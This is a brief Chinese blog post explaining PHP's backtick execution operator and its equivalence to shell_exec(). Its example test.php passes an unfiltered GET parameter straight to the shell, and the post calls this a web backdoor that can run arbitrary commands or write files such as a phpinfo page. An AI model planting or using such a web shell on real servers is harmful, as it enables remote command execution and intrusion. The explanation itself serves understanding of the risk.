PHP支持一个执行运算符:反引号(
``)。注:不是单引号
反引号运算符效果与函数shell_exec()相同,
Note:反引号运算符在激活了
安全模式或关闭了
shell_exec()时是无效的。
测试
1.下面命名为test.php
-
<?php
-
$a = $_GET['p'];
-
echo `$a`;
-
?>
2.当访问时将显示c:\perl目录
可以任意执行命令的,就可以直接写入一句话,phpinfo();
执行后,直接访问info.php文件。
总结:
test.php在没有关闭安全模式或没有关闭函数shell_exec()情况下,可以被认为是一个web后门。
参考:
http://php.net/manual/zh/language.operators.execution.php
阅读(854) | 评论(1) | 转发(0) |